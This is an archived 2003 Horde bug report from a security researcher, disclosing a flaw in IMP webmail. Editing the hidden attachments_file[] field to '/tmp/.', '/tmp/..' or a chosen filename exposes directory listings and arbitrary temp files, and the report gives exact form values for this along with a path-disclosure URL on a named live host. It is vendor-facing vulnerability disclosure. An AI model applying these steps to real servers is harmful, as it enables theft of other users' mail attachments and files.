[bugs] [Bug 1251] New - * Folder listing and possible file or
attachment theft using IMP attachements.
bugs at bugs.horde.org
bugs at bugs.horde.org
Mon May 19 03:27:43 PDT 2003
http://bugs.horde.org/show_bug.cgi?id=1251
*** shadow/1251 Mon May 19 07:27:43 2003
--- shadow/1251.tmp.19555 Mon May 19 07:27:43 2003
***************
*** 0 ****
--- 1,66 ----
+ Bug#: 1251
+ Product: Horde
+ Version: 0.1 Alpha
+ Platform: PHP Code
+ OS/Version: Linux
+ Status: NEW
+ Resolution:
+ Severity: major
+ Priority: P2
+ Component: IMP
+ Area: BUILD
+ AssignedTo: chuck at horde.org
+ ReportedBy: brett.moore at security-assessment.com
+ URL:
+ Summary: * Folder listing and possible file or attachment theft using IMP attachements.
+
+ Hi, I'm unable to confirm version number at the moment. If you would like
+ I can do so and get them to you in the next coupla days.
+
+ Horde / IMP Web mail system
+
+ * Folder listing and possible file or attachment theft.
+
+ * Log in and go to the compose mail screen.
+ This will give you a valid unique email id setting and cookie
+ * Add an attachment.
+ * View the source
+ * Set the action field to the horde server
+ * Locate this section on the form
+
+ <input type="hidden" name="attachments_name[]" value="proof.txt" />
+ <input type="hidden" name="attachments_size[]" value="29" />
+ <input type="hidden" name="attachments_file[]"
+ value="/tmp/impattQxBe6y" />
+ <input type="hidden" name="attachments_type[]" value="text/plain" />
+ <input type="checkbox" name="delattachments[]"
+ value="/tmp/impattQxBe6y" />
+ * By changing this field value
+ <input type="hidden" name="attachments_file[]"
+ value="/tmp/impattQxBe6y" />
+
+ * to either
+ <input type="hidden" name="attachments_file[]" value="/tmp/." />
+
+ * or
+ <input type="hidden" name="attachments_file[]" value="/tmp/.." />
+
+ * will cause an email to be sent with directory listings of /tmp/ and the
+ directory below.
+
+ * After viewing the /tmp/ directory the filename can be specified to download
+ any file from there.
+ <input type="hidden" name="attachments_file[]" value="/tmp/filename" />
+
+
+ And a simple path disclosure, tho this too may be not directly related to
+ horde / imp.
+
+ http://vmail.visp.co.nz/horde/css.php?app=imp./
+ A fatal error has occurred:
+
+ 'imp./' is not configured in the Horde Registry.
+
+ [line 408 of /usr/local/apache/htdocs/vmail.visp.co.nz/horde/lib/Registry.php]
+
+ Details have been logged for the administrator.
More information about the bugs
mailing list